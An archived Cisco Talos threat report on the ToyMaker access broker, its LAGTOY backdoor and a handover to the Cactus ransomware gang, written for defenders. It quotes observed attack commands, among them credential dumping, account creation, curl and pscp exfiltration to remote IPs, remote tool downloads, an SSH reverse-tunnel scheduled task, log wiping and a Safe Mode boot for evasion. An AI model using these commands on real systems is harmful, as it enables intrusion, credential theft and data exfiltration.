{
	"id": "5c2285d3-ec1f-48a2-960b-7d69ebad120d",
	"created_at": "2026-04-06T00:17:26.11552Z",
	"updated_at": "2026-04-10T03:30:57.351169Z",
	"deleted_at": null,
	"sha1_hash": "deaff445b1398ed6f26183fdc58a672def8b56f1",
	"title": "Introducing ToyMaker, an initial access broker working in cahoots with double extortion gangs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 475507,
	"plain_text": "Introducing ToyMaker, an initial access broker working in cahoots with double extortion gangs\r\nBy Joey Chen\r\nPublished: 2025-04-23 · Archived: 2026-04-05 20:16:05 UTC\r\nIn 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise involving a combination of threat actors.\r\nFrom initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of dual-use remote administration, SSH and file transfer tools.\r\nThe initial access broker (IAB), which Talos calls “ToyMaker” and assesses with medium confidence to be a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor, which we call “LAGTOY”, and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.\r\nA compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker hand over access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network.\r\nTurnaround time from ToyMaker to Cactus\r\nIntrusion analysis across various endpoints enabled Talos to build a timeline of events from initial compromise to access handover to subsequent secondary malicious activity. 
The following is a high-level timeline of events:\r\nDay of activity | Type of malicious activity | Threat actor\r\nInitial compromise | User enumeration; preliminary recon; fake user creation; credential extraction via Magnet RAM Capture | ToyMaker\r\n+2 day(s) | Deploy LAGTOY implant | ToyMaker\r\nLull in activity for 3 weeks\r\n+3 weeks, aka Cactus day 0 | Endpoint enumeration | Cactus\r\nCactus day 2 | Server and file enumeration; indicator removal | Cactus\r\nCactus day 2 and 3 | Proliferation through enterprise | Cactus\r\nCactus day 4 | Archiving sensitive data for exfiltration - extortion | Cactus\r\nCactus day 8 | Remote management tools deployment: eHorus, RMS, AnyDesk; OpenSSH connections | Cactus\r\nCactus day 12 | Malicious account creations for ransomware deployment | Cactus\r\nCactus day 12 | Delete volume shadow copies; boot recovery modifications | Cactus\r\nhttps://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/\r\nPage 1 of 17\r\nAfter the initial compromise, ToyMaker performed preliminary reconnaissance, credential extraction and backdoor deployment within the span of a week, after which they took no further action. Talos did not observe any victim-specific data exfiltration, nor did we observe attempts to discover and pivot to other valuable endpoints.\r\nAfter a lull in activity of approximately three weeks, we observed the Cactus ransomware group make its way into the victim enterprise using credentials stolen by ToyMaker. 
Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions or goals.\r\nTalos therefore assesses with medium confidence that ToyMaker is a financially motivated initial access broker (IAB) who acquires access to high-value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment.\r\nThe disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately. However, it is imperative to establish relationships between the two. In fact, similar connections need to be incorporated into the paradigms used for threat modeling any suspected IABs. In subsequent blogs, Talos will propose a new methodology for modeling and tracking compartmentalized yet somewhat connected threats.\r\nToyMaker has been known to use a custom malware family: a backdoor Talos tracks as LAGTOY. ToyMaker usually infiltrates an organization's environment by successfully exploiting a known vulnerability in an unpatched internet-facing server. 
Successful compromise almost immediately results in rapid reconnaissance of the system:\r\nCOMMAND | INTENT\r\nwhoami | System Information Discovery [T1082]\r\nnet user | System Information Discovery [T1082]\r\nnet localgroup | System Information Discovery [T1082]\r\nnet group | System Information Discovery [T1082]\r\nnet user Administrator | System Information Discovery [T1082]\r\nnltest /domain_trusts | System Information Discovery [T1082]\r\nnet group Enterprise Admins | System Information Discovery [T1082]\r\nipconfig /all | Gather Victim Network Information [T1590]\r\nReconnaissance is followed by the creation of a fake user account named 'support':\r\nCOMMAND | INTENT\r\nnet user support Sup0rtadmin /add | Create Account [T1136]\r\nnet localgroup administrators support /add | Create Account [T1136]\r\nFollowing this, the actor starts an SSH listener on the endpoint using the Windows OpenSSH package (sshd.exe). The endpoint then receives a connection from another infected host on the network that creates a binary named 'sftp-server.exe', which is the SFTP server module of OpenSSH. sftp-server.exe then connects to a remote host to download the Magnet RAM Capture executable:\r\nCOMMAND | INTENT\r\nMRCv120.exe /accepteula /silent /go | Extract credentials [T1003]\r\nMagnet RAM Capture is a freely available forensics tool used to obtain a memory dump of the host, from which credentials can be harvested. This tactic likely explains the high number of compromised systems that Talos identified during this campaign. 
\r\nThe memory dump is then archived using the 7za.exe archive creation command [T1560]:\r\n7za.exe a -p -mmt2 -mhe 1.7z 1.r\r\nSubsequently the archive is exfiltrated from the endpoint using PuTTY’s SCP utility (pscp) [T1048]:\r\npscp.exe -P 53 1.7z root@\u003cRemote_IP\u003e:/root\r\nOnce the attackers have obtained the memory dump, they use the sftp-server.exe connection again to download and execute a custom-made reverse shell implant we’re calling “LAGTOY”.\r\nLAGTOY is persisted on the system by creating a service for it [T1543]:\r\nsc create WmiPrvSV start= auto error= ignore binPath= C:\\Program Files\\Common Files\\Services\\WmiPrvSV.exe\r\nThe implant reaches out to the C2 server configured in it to receive commands to execute on the endpoint, such as:\r\nCOMMAND | INTENT\r\ntasklist | System Information Discovery [T1082]\r\nquser | System Information Discovery [T1082]\r\nipconfig /all | System Information Discovery [T1082]\r\nLAGTOY - ToyMaker’s staple backdoor\r\nLAGTOY is a simple yet effective implant. The backdoor is called HOLERUN by Mandiant. It is meant to periodically reach out to the hard-coded C2 server and accept commands to execute on the infected endpoint. It is installed on the system as part of a service and contains rudimentary anti-debugging checks before initiating connections to the C2.\r\nFigure: LAGTOY execution logic.\r\nAs an anti-debug technique, the malware registers a custom unhandled exception filter using kernel32!SetUnhandledExceptionFilter(). If the malware is running under a debugger, the custom filter won’t be called and the exception will be passed to the debugger. Therefore, if the unhandled exception filter is registered and control is passed to it, the process is not running under a debugger.\r\nLAGTOY is intended to run on the infected system as a service with the name 'WmiPrvSV'. 
\r\nBoth the C2 IP address and the protocol port are hardcoded into LAGTOY. The communication is done over port 443 with a raw socket, not using TLS as one would expect on this TCP port.\r\nFigure: Command and control communication.\r\nThe C2 will send specific administration codes to LAGTOY:\r\n'#pt': Stop service.\r\n'#pd': Break from the current execution chain and check if the service has been stopped. If stopped, then Sleep for a specific time period and re-initiate the connection to the C2.\r\n'#ps': Simply create the specified process/command.\r\nIf the code doesn’t begin with '#', then simply execute the provided command or process name on the endpoint.\r\nFigure: Command recognition logic of LAGTOY.\r\nCompared with the sample discovered in 2022 by Mandiant, this sample added the '#ps' handler for creating a process for a command.\r\nFigure: The sample from 2022 does not have the '#ps' parameter.\r\nTime-based execution\r\nLAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific time period. Talos assesses with high confidence that this logic is a novel, custom-built feature unique to the LAGTOY family of implants.\r\nLAGTOY is able to process three commands from the C2 with a Sleep interval of 11000 milliseconds between them. During its beaconing cycle it will record the last successful time of C2 communications and successful command execution. 
If the commands issued by the C2 have been failing for at least 30 minutes, then the implant will send a message to the C2 informing it of the failure to execute commands.\r\nLAGTOY has an embedded watchdog routine. If it has been running for a cumulative time of more than 60 minutes, it will stop executing commands and then check if the service has been stopped. If the service is still active, then the implant will reinitiate connections to the C2.\r\nFigure: Overall timing and C2 communications logic of LAGTOY.\r\nToyMaker gives way to ransomware cartels\r\nAlmost a month after ToyMaker established access to the victim enterprise, the actor passed on the access to a secondary threat actor, a Cactus ransomware affiliate, who primarily conducts ransomware and double extortion operations.\r\nThe Cactus gang conducted their own reconnaissance and persistence, deploying their own set of malware instead of using LAGTOY as a vehicle into the enterprise. Furthermore, they initially accessed the compromised endpoint using compromised user credentials obtained earlier by ToyMaker using the Magnet RAM Capture tool.\r\nInitial recon and network scans\r\nCactus immediately began conducting network scans to identify systems of interest for proliferation. 
To spread across the network, they first ran a WSMAN discovery script to enumerate all endpoints configured to handle PowerShell remoting.\r\nCOMMAND | INTENT\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File .\\fs.ps1 result.csv | Remote System Discovery [T1018]\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpassword\u003e pss.7z .\\result.csv | Results are then compressed and sent to a remote server. Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\curl.exe -k -T .\\pss.7z hxxps[:]//\u003cremote_ip\u003e:8443 | Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpwd\u003e .\\CP-SERVER3.7z .\\CP-SERVER3.txt | The same is done for other information. Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\7z.exe a -p\u003cpwd\u003e .\\FILEN01.7z .\\FILEN01.txt | Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\curl[.]exe -k -T .\\CP-SERVER3.7z hxxps[://]\u003cremote_ip\u003e:8443 | Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\curl[.]exe -p -k -T .\\FILEN01.7z hxxps[://]\u003cremote_ip\u003e:8443 | Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\7z[.]exe a -p\u003cpwd\u003e .\\FILE-SERVER.7z .\\FILE-SERVER[.]txt | Data exfiltration [T1048]\r\nC:\\PerfLogs\\Admin\\curl[.]exe -k -T .\\FILE-SERVER.7z hxxps[://]\u003cremote_ip\u003e:8443 | Data exfiltration [T1048]\r\nOnce the attackers had obtained the information, they would clean up traces of their access:\r\nCOMMAND | INTENT\r\nC:\\Windows\\system32\\reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f | Indicator Removal: Clear Command History [T1070]\r\nC:\\Windows\\system32\\reg.exe delete HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default /va /f | Indicator Removal: Clear Network Connection History and Configurations [T1070]\r\nC:\\Windows\\system32\\reg.exe delete HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers /f | Indicator Removal: Clear Network Connection History and Configurations [T1070]\r\nC:\\Windows\\system32\\reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers | Indicator Removal: Clear Network Connection History and Configurations [T1070]\r\nC:\\Windows\\system32\\attrib.exe 
%userprofile%\\documents\\Default.rdp -s -h | Indicator Removal: Clear Network Connection History and Configurations [T1070]\r\nnet user support /delete | Indicator Removal: Clear Persistence [T1070]\r\nData Exfiltration\r\nThe harvested credentials provided ToyMaker access to a multitude of systems, on which the threat actor performed reconnaissance for valuable information. These files were either archived and then exfiltrated using multiple dual-use tools such as 7zip and curl, or extracted directly using file transfer utilities such as WinSCP [T1560, T1048]:\r\nC:\\PerfLogs\\Admin\\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test\\ -xr!tests\\ -xr!jdk8\\ e:\\tmp\u003cfilename\u003e\r\nC:\\PerfLogs\\Admin\\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p\u003cpassword\u003e -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test\\ -xr!tests\\ -xr!jdk8\\ e:\\tmp\\\u003cfilename\u003e\r\nOn other endpoints the attackers discovered and archived what is believed to be the victim’s customer data for exfiltration as well [T1560, T1048]:\r\nC:\\Windows\\system32\\cmd.exe /c \u003cpath\u003e\\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on \u003cpath\u003e\\0001.7z \u003cpath\u003ePrivate Folder\\Customers\\\u003cpath\u003e -p\u003cpassword\u003e\r\nCactus used a variety of remote admin tools on different endpoints to maintain long-term access. 
The tools included:\r\neHorus Agent: Remote control software also known as Pandora RC\r\nAnyDesk: Remote Desktop application\r\nRemote Utilities for Windows Admin (RMS Remote Admin): A Russian-made remote management tool/platform\r\nOpenSSH: SSH package included with and available for installation on the Windows OS\r\nThe remote administration utilities were downloaded from remote, attacker-controlled locations via PowerShell and Impacket:\r\nCOMMANDS from Impacket | INTENT\r\ncmd.exe /Q /c powershell iwr -Uri http://\u003cremote_IP\u003e:7423/file.msi -OutFile C:\\Programdata\\f.msi 1\u003e \\\\127.0.0.1\\ADMIN$\\__\u003crandom\u003e 2\u003e\u00261 | Stage Capabilities: Upload Malware [T1608]\r\ncmd.exe /Q /c msiexec.exe /i C:\\Programdata\\f.msi /q EHUSER=\u003cusername\u003e STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1\u003e \\\\127.0.0.1\\ADMIN$\\__\u003crandom\u003e 2\u003e\u00261 | System Binary Proxy Execution: Msiexec [T1218]\r\nIn another instance, the attackers created reverse shells using OpenSSH, where a scheduled task was created to connect to the C2 server on an hourly basis to accept and execute commands:\r\nCOMMAND | INTENT\r\nSCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\\Windows\\temp\\sys_log.bat \u003e c:\\Windows\\temp\\log.txt | Scheduled Task/Job [T1053]\r\nSCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\\ProgramData\\ssh\\ssh.exe -o \"StrictHostKeyChecking no\" root@\u003cremote_ip\u003e -p 443 -R 25369 -NCqf -i \"C:\\Windows\\temp\\syslog.txt\" \u0026 timeout /t 15) | Scheduled Task/Job [T1053]; Remote Services: SSH [T1021]\r\nCactus ransomware group takes its operational 
security seriously. They remove access to the file that contains the SSH private key used to exfiltrate information. This prevents the victim from reading the key under normal circumstances.\r\nCOMMAND | INTENT\r\nicacls C:\\Windows\\Temp\\syslog.txt | File and Directory Permissions Modification: Windows File and Directory Permissions Modification [T1222]\r\nicacls.exe C:\\Windows\\temp\\syslog.txt /c /t /inheritance:d | File and Directory Permissions Modification [T1222]\r\nicacls.exe C:\\Windows\\Temp\\syslog.txt /c /t /remove BUILTIN\\Administrators | File and Directory Permissions Modification [T1222]\r\nicacls.exe C:\\Windows\\Temp\\syslog.txt /c /t /remove \u003cuserid\u003e | File and Directory Permissions Modification [T1222]\r\nicacls.exe C:\\Windows\\temp\\syslog.txt /inheritance:r /grant SYSTEM:F | File and Directory Permissions Modification [T1222]\r\nsyslog.txt is the private key used by the threat actor for initiating SSH connections back to actor-controlled infrastructure.\r\nNew user accounts\r\nOn some endpoints, the malicious operators created new unauthorized user accounts, likely to facilitate deployment of ransomware:\r\nnet user whiteninja \u003cpassword\u003e /add\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v LegalNoticeText /t REG_SZ /d  /f\r\nreg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f\r\nreg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v AutoLogonCount /t REG_DWORD /d 1 /f\r\nAbusing Safe Mode for defense evasion\r\nDuring our investigation, Talos found that the threat actor rebooted compromised hosts into Safe Mode using the following commands:\r\nbcdedit /set {default} safeboot minimal\r\nshutdown -r -f -t 0\r\nBooting a system into Safe Mode could be motivated by the intention to disable security products, because the system loads only a minimal set of drivers and services. 
Some security products might be inactive or limited under Safe Mode, and the threat actor could leverage this to modify registry keys or settings to disable the security products completely [T1562.001].\r\nCactus also extensively uses Metasploit shellcode-injected copies of the Windows binaries PuTTY and ApacheBench (a benchmarking tool for Apache HTTP servers) to execute code on the compromised systems. These contact the same remote server used to host the portable eHorus agent, 51[.]81[.]42[.]234, over ports 53, 443, 8343 and 9232. Cactus additionally employed ELF binaries generated by Metasploit communicating with the same remote C2, 51[.]81[.]42[.]234.\r\nFigure: Metasploit shellcode communicating with the remote server.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. 
\r\nSecure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nIndicators of Compromise (IOCs)\r\nIOCs for this threat can be found on our GitHub repository here.\r\nHashes - LAGTOY\r\nfdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826\r\nMetasploit shells\r\nNetwork 
IOCs\r\nToyMaker\r\nCactus\r\nSource: https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/"
	],
	"report_names": [
		"introducing-toymaker-an-initial-access-broker"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434646,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.pdf",
		"text": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.txt",
		"img": "https://archive.orkl.eu/deaff445b1398ed6f26183fdc58a672def8b56f1.jpg"
	}
}